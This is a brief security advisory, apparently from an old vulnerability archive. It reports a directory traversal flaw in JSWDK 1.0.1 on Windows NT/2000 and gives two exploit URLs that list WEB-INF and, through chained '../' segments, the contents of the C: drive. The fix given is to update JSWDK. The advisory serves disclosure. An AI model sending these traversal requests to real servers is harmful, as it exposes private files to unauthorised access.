COMMAND

    JSWDK

SYSTEMS AFFECTED

    JavaServer Web Dev Kit(JSWDK)1.0.1 for win2000

PROBLEM

    Following is  based on  a CHINANSL  Security Advisory  CSA-200106.
    A security vulnerability has been found in Windows NT/2000 systems
    that have JSWDK 1.0.1 installed.  The vulnerability allows  remote
    attackers  to  access  files  outside  the document root directory
    scope.

    Exploits:

        http://localhost:8080/examples//WEB-INF/

    listing /WEB-INF/ Directory.

        http://localhost:8080/../examples//WEB-INF/../../../../../

    if JSWDK installd  in c:\ the  question will listing  c:\ all file
    and directory.

SOLUTION

    Update JSWDK.